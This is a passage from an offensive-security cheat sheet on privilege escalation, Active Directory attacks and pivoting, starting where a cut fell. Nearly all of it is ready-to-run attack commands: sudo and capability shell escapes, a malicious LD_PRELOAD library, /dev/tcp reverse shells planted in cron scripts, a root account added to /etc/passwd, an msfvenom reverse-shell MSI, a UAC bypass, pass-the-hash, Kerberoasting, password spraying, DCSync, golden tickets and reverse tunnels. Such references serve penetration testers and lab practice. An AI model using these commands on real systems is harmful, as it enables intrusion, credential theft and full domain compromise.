# /usr/bin/python → python -c 'import os; os.execl("/bin/sh","sh")'
Sudo
# Check sudo permissions
sudo -l
# If (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'
# If (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/bash \; -quit
# If (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c 'import os; os.system("/bin/bash")'
# If (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd → !bash
# sudo -l shows env_keep+=LD_PRELOAD
# Create malicious shared library:
cat > /tmp/pe.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so <any_sudo_binary>
Cron Jobs
# View cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# If a cron script is world-writable:
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" >> /path/to/script.sh
# If a cron uses a relative path (PATH hijack):
echo "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1" > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
Capabilities
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities:
# cap_setuid — change UID to root
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_net_raw — raw socket access (useful for sniffing)
# cap_sys_admin — broad system administration
# perl with cap_setuid
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Writable /etc/passwd
# If /etc/passwd is writable, add a root user
# Generate password hash
openssl passwd -1 -salt xyz hacker
# Append to /etc/passwd
echo 'hacker:$1$xyz$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
Kernel Exploits
# Check kernel version
uname -r
cat /proc/version
# DirtyCow (CVE-2016-5195) — Linux 2.6.22 < 3.9
# DirtyPipe (CVE-2022-0847) — Linux 5.8 ≤ 5.16.11
# PwnKit (CVE-2021-4034) — polkit pkexec
# linux-exploit-suggester will map kernel version to known exploits
./linux-exploit-suggester.sh | grep -i "high"
Privilege Escalation — Windows
Automated Enumeration
# WinPEAS
.\winpeas.exe
# PowerUp (PowerSploit)
. .\PowerUp.ps1
Invoke-AllChecks
# Seatbelt — security-focused enumeration
.\Seatbelt.exe -group=all
# SharpUp
.\SharpUp.exe audit
Service Exploits
# Find services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -ucqv <service_name> /accepteula
# Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# If path is: C:\Program Files\Vulnerable App\service.exe
# Drop payload at: C:\Program.exe or C:\Program Files\Vulnerable.exe
# Weak service binary permissions
# Replace the service binary with your payload, restart the service
sc stop <service>
sc start <service>
Registry
# AlwaysInstallElevated — installs MSI as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both = 1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
# Stored credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s # PuTTY creds
Token Impersonation
# Check privileges
whoami /priv
# SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege
# → PrintSpoofer, RoguePotato, JuicyPotato
# PrintSpoofer (Windows 10 / Server 2019)
.\PrintSpoofer.exe -i -c cmd
# RoguePotato
.\RoguePotato.exe -r 10.10.14.5 -e "cmd.exe" -l 9999
# JuicyPotato (older Windows)
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}
UAC Bypass
# Check UAC level
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
# fodhelper bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Pass the Hash
# psexec with NTLM hash (no plaintext password needed)
python3 psexec.py administrator@10.10.10.1 -hashes :NTLM_HASH
# CrackMapExec PTH
crackmapexec smb 10.10.10.1 -u administrator -H NTLM_HASH
crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH # spray subnet
# Evil-WinRM PTH
evil-winrm -i 10.10.10.1 -u administrator -H NTLM_HASH
Active Directory
Initial Enumeration
# BloodHound — AD attack path visualisation
# Collect data with SharpHound (on Windows)
.\SharpHound.exe -c All
# Or BloodHound.py (from Linux)
python3 bloodhound.py -u user -p password -d domain.local -dc 10.10.10.1 -c All
# Enum4linux-ng
enum4linux-ng -A 10.10.10.1
# CrackMapExec — AD enumeration
crackmapexec smb 10.10.10.1 -u user -p password --users
crackmapexec smb 10.10.10.1 -u user -p password --groups
crackmapexec smb 10.10.10.1 -u user -p password --shares
crackmapexec smb 10.10.10.1 -u user -p password --pass-pol # password policy
# LDAP enumeration with ldapdomaindump
python3 ldapdomaindump.py -u 'domain\user' -p password 10.10.10.1
Kerberoasting
# Request TGS tickets for service accounts — crack offline
# Impacket
python3 GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 -request
# PowerView (on Windows)
Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv tickets.csv
# Crack with hashcat
hashcat -m 13100 tickets.txt rockyou.txt
AS-REP Roasting
# Users with Kerberos pre-auth disabled — get crackable hash without password
python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.1 -no-pass
# Crack with hashcat
hashcat -m 18200 asrep_hashes.txt rockyou.txt
Password Spraying
# CrackMapExec — spray one password across all users (avoid lockout)
crackmapexec smb 10.10.10.1 -u users.txt -p 'Password123' --continue-on-success
# Kerbrute — fast Kerberos-based spray (no failed logon events)
kerbrute passwordspray -d domain.local --dc 10.10.10.1 users.txt 'Password123'
DCSync Attack
# Requires Domain Admin or replication rights
# Dump all hashes from DC
python3 secretsdump.py domain.local/admin:password@10.10.10.1
# Via Mimikatz (on Windows)
lsadump::dcsync /domain:domain.local /all /csv
lsadump::dcsync /domain:domain.local /user:krbtgt # just krbtgt hash
Golden Ticket
# Requires krbtgt hash — forge TGT for any user, any time
# Get krbtgt hash via DCSync first
# Mimikatz
kerberos::golden /user:administrator /domain:domain.local \
/sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi
# Impacket — use the ticket (convert golden.kirbi to golden.ccache with ticketConverter.py first)
export KRB5CCNAME=golden.ccache
python3 psexec.py domain.local/administrator@dc.domain.local -k -no-pass
Common AD Misconfigurations
# GenericAll / GenericWrite on user → reset their password
python3 changepasswd.py domain.local/attacker:password@10.10.10.1 -newpass 'Hacked123!' -altuser victim
# WriteDACL on domain → grant DCSync rights
python3 dacledit.py domain.local/user:password -dc-ip 10.10.10.1 -action write \
-rights DCSync -principal attacker -target-dn "DC=domain,DC=local"
# ForceChangePassword → change user password without knowing current
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'Hacked123!' -AsPlainText -Force)
Pivoting & Tunnelling
SSH Tunnelling
# Local port forwarding — forward remote service to local port
# Access remote 192.168.1.10:80 via localhost:8080
ssh -L 8080:192.168.1.10:80 user@jumphost
# Dynamic port forwarding — SOCKS proxy through SSH
ssh -D 1080 user@jumphost
# Then use proxychains: proxychains nmap -sT 192.168.1.0/24
# Remote port forwarding — expose local port on remote host
ssh -R 4444:localhost:4444 user@attacker
# SSH through a jump host
ssh -J user@jumphost user@internal_host
Proxychains
# Configure /etc/proxychains.conf
# Add: socks5 127.0.0.1 1080
# Use any tool through the proxy
proxychains nmap -sT -Pn 192.168.1.1
proxychains curl http://192.168.1.1
proxychains python3 exploit.py
Chisel
# Fast TCP tunnel over HTTP — great for restricted environments
# Attacker (server mode)
./chisel server -p 8080 --reverse
# Target (client mode) — reverse SOCKS proxy
./chisel client 10.10.14.5:8080 R:socks
# Forward specific port
./chisel client 10.10.14.5:8080 R:3306:127.0.0.1:3306
Ligolo-ng
# Modern pivoting tool — creates a TUN interface
# Attacker — start proxy
./proxy -selfcert
# Target — connect agent
./agent -connect 10.10.14.5:11601 -ignore-cert
# On attacker — add route to internal network
ip route add 192.168.1.0/24 dev ligolo
# Start tunnel in ligolo UI: session → start
Netsh (Windows Port Forwarding)
# Forward incoming connections to internal host
netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=4444 connectaddress=192.168.1.10
# View rules
netsh interface portproxy show all
# Remove rule
netsh interface portproxy delete v4tov4 listenport=4444 listenaddress=0.0.0.0
Socat
# Port forwarding
socat TCP-LISTEN:8080,fork TCP:192.168.1.10:80
# Reverse shell relay
socat TCP-LISTEN:4444,fork TCP:10.10.14.5:4444
# Encrypted shell listener
socat OPENSSL-LISTEN:4444,cert=cert.pem,verify=0,fork EXEC:/bin/bash
For SUID/capability binary exploitation, always check GTFOBins. For Windows binaries, check LOLBAS.